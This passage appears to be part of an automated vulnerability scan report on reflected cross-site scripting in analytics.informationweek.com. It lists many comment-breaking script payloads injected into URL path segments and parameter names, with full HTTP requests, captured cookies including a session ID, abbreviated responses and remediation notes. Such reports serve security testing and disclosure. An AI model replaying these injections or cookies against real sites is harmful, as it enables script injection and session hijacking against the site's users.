<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ce=http%3A%2F%2Fanalytics.informationweek.com%2Fjsfbbbc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3cd9c91875d%2Fgetdata.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsfbbbc--><script>alert(1)</script>3cd9c91875d/getdata.js"> ...[SNIP]...
3.36. http://analytics.informationweek.com/js/getdata.js [REST URL parameter 2]
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2750a--><script>alert(1)</script>2ac3af659de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/getdata.js2750a--><script>alert(1)</script>2ac3af659de HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fjs%2Fgetdata.js2750a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ac3af659de&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/getdata.js2750a--><script>alert(1)</script>2ac3af659de"> ...[SNIP]...
3.37. http://analytics.informationweek.com/js/jquery-1.3.1.min.js [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e0a5--><script>alert(1)</script>6251c524583 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... A%2F%2Fanalytics.informationweek.com%2Fjs9e0a5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6251c524583%2Fjquery-1.3.1.min.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js9e0a5--><script>alert(1)</script>6251c524583/jquery-1.3.1.min.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload e723d--><script>alert(1)</script>c3717aeb084 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ormationweek.com%2Fjs%2Fjquery-1.3.1.min.jse723d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec3717aeb084&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery-1.3.1.min.jse723d--><script>alert(1)</script>c3717aeb084"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload d91ad--><script>alert(1)</script>877e6cf0607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2F%2Fanalytics.informationweek.com%2Fjsd91ad--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E877e6cf0607%2Fjquery.prettyPhoto.js&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/jsd91ad--><script>alert(1)</script>877e6cf0607/jquery.prettyPhoto.js"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload a7297--><script>alert(1)</script>0f839360ee4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... tionweek.com%2Fjs%2Fjquery.prettyPhoto.jsa7297--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f839360ee4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 31bd7--><script>alert(1)</script>ccf4cc96713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3Eccf4cc96713%2F1%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload c5371--><script>alert(1)</script>435eecb50aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Cscript%3Ealert%281%29%3C%2Fscript%3E435eecb50aa%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e86ed--><script>alert(1)</script>a235d674e47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Cscript%3Ealert%281%29%3C%2Fscript%3Ea235d674e47%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 772ba--><script>alert(1)</script>2d612bfec11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d612bfec11&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11"> ...[SNIP]...
3.45. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload af5ae--><script>alert(1)</script>57fed5e992d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... script%3Ealert%281%29%3C%2Fscript%3E57fed5e992d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 13258--><script>alert(1)</script>d54dc696a59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:58 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... --%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54dc696a59%2F10%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9c016--><script>alert(1)</script>7e4d87e08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 016--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e4d87e08f%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e9aa2--><script>alert(1)</script>6407169f2c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 9aa2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6407169f2c9%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload f552e--><script>alert(1)</script>256d5dde1af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... lf552e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E256d5dde1af&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af"> ...[SNIP]...
3.50. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aa634--><script>alert(1)</script>9cd1610281f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
